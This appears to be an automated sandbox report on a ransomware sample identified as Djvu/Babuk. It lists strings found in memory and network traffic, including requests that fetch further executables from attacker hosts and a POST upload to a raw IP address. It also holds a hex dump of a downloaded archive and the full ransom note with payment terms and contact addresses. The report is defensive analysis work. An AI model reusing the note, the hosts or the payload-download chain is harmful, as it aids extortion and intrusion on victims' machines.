Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json=P
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsongP
Source: U59WtZz2Sg.exe, 00000001.00000003.306241286.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306100466.000000000089F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonk
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonl
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.545871666.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460215496.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458323064.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/about/en-us/0
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://we.tl/t-5UcwRdS3
Source: U59WtZz2Sg.exe, 00000005.00000002.577338464.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385599244.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://we.tl/t-5UcwRdS3ED
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.gnu.org/licenses/lgpl.html.
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: U59WtZz2Sg.exe, 00000005.00000003.444451772.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=02Google
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/zGoogle
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown DNS traffic detected: queries for: api.2ip.ua
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fresherlights.com
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: uaery.top
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fresherlights.com
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1Host: 88.198.94.71
Source: global traffic HTTP traffic detected: GET /176356074953.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Nov 2022 23:22:31 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.350334293.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: U59WtZz2Sg.exe, 00000005.00000003.350997403.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: U59WtZz2Sg.exe, 00000005.00000003.351612553.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/B equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1417805488924803Host: 88.198.94.71Content-Length: 131097Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49712 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 1_2_004822E0
Creates a DirectInput object (often for capturing keystrokes)
Source: U59WtZz2Sg.exe, 00000000.00000002.304665425.00000000007EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Drops certificate files (DER)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands
barindex
Found ransom note / readme
Source: C:\_readme.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-5UcwRdS3EDPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@fishmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0609djfsieEK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS Jump to dropped file
Yara detected Babuk Ransomware
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR
Yara detected Djvu Ransomware
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
